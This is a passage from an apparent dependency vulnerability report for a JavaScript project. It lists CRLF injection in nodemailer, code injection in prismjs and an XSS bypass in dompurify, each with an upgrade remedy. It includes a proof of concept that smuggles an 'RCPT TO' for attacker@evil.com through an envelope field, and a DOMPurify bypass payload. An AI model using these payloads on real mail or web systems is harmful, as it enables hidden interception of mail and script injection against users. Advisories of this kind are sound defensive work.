        tls: { rejectUnauthorized: false },
    });

    transporter.sendMail({
        from: 'sender@example.com',
        to: 'recipient@example.com',
        subject: 'Normal email',
        text: 'This is a normal email.',
        envelope: {
            from: 'sender@example.com',
            to: ['recipient@example.com'],
            size: '100\r\nRCPT TO:<attacker@evil.com>',
        },
    }, (err) => {
        if (err) console.error('Error:', err.message);
        console.log('\nExpected output above:');
        console.log('  C: MAIL FROM:<sender@example.com> SIZE=100');
        console.log('  C: RCPT TO:<attacker@evil.com>        <-- INJECTED');
        console.log('  C: RCPT TO:<recipient@example.com>');
        server.close();
        transporter.close();
    });
});

Remediation

Upgrade nodemailer to version 8.0.4 or higher.

References

CRLF Injection vulnerability report

low severity

Arbitrary Code Injection

  • Vulnerable module: prismjs
  • Introduced through: swagger-ui-react@5.17.14

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer swagger-ui-react@5.17.14 react-syntax-highlighter@15.6.6 refractor@3.6.0 prismjs@1.27.0

Overview

prismjs is a lightweight, robust, elegant syntax highlighting library.

Affected versions of this package are vulnerable to Arbitrary Code Injection via the document.currentScript lookup process. An attacker can manipulate the web page content and execute unintended actions by injecting HTML elements that overshadow legitimate DOM elements.

Note:

This is only exploitable if the application accepts untrusted input containing HTML but not direct JavaScript.

Remediation

Upgrade prismjs to version 1.30.0 or higher.

References

Arbitrary Code Injection vulnerability report

low severity

Cross-site Scripting (XSS)

  • Vulnerable module: dompurify
  • Introduced through: swagger-ui-react@5.17.14

Detailed paths

  • Introduced through: screamer@SVendittelli/screamer swagger-ui-react@5.17.14 dompurify@3.1.4
    Remediation: Upgrade to swagger-ui-react@5.19.0.

Overview

dompurify is a DOM-only XSS sanitizer for HTML, MathML and SVG.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to incorrect handling of template literals in regular expressions. An attacker can manipulate the output of the script by injecting malicious payloads that bypass the dompurify sanitization.

PoC

DOMPurify.sanitize(
  `<math><foo-test><mi><li><table><foo-test><li></li></foo-test><a>
      <style>
        <! \${
      </style>
      }
      <foo-b id="><img src onerror='alert(1)'>">hmm...</foo-b>
    </a></table></li></mi></foo-test></math>
  `,
  {
    SAFE_FOR_TEMPLATES: true,
    CUSTOM_ELEMENT_HANDLING: {
      tagNameCheck: /^foo-/,
    },
  }
);

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade dompurify to version 3.2.4 or higher.

References

Cross-site Scripting (XSS) vulnerability report